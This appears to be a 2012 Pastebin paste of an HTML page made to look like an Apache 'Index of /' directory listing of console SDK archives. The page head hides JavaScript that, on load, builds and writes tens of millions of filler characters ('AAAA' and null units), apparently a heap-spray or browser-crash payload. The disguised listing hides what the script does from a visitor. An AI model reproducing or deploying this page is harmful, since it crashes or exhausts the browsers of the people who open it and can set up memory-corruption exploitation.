Guest User

Untitled

a guest
Apr 14th, 2012
152
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.38 KB | None | 0 0
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  2. <html>
  3. <head>
  4. <script type="text/javascript">
  5. var str = unescape("%u4141%u4141");
  6. var str2 = unescape("%u0000%u0000");
  7. var finalstr2 = mul8(str2, 49000000);
  8. var finalstr = mul8(str, 21000000);
  9.  
  10.  
  11. document.write(finalstr2);
  12. document.write(finalstr);
  13.  
  14. function mul8 (str, num) {
  15. var i = Math.ceil(Math.log(num) / Math.LN2),
  16. res = str;
  17. do {
  18. res += res;
  19. } while (0 < --i);
  20. return res.slice(0, str.length * num);
  21. }
  22. </script>
  23. <title>Index of /</title>
  24. </head>
  25. <body>
  26. <h1>Index of /</h1>
  27. <pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icon$
  28. <img src="/icons/unknown.gif" alt="[ ]"> <a href="Ndevmenu_1.16.rar">Ndevmenu_1.16.rar</a> 31-Jan-2008 01:54 250K
  29. <img src="/icons/unknown.gif" alt="[ ]"> <a href="TwlightSDK-4_0.zip">TwlightSDK-4_0.zip</a> 21-Jan-2008 04:35 35M
  30. <img src="/icons/unknown.gif" alt="[ ]"> <a href="NitroSDK-3_1-060511a.zip">NitroSDK-3_1-060511a.zip</a> 12-Jan-2008 23:33 40M
  31. <img src="/icons/unknown.gif" alt="[ ]"> <a href="bootmii0.2b.tar.gz">bootmii0.2b.tar.gz</a> 16-Feb-2009 14:25 50k
  32. <hr></pre>
  33. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment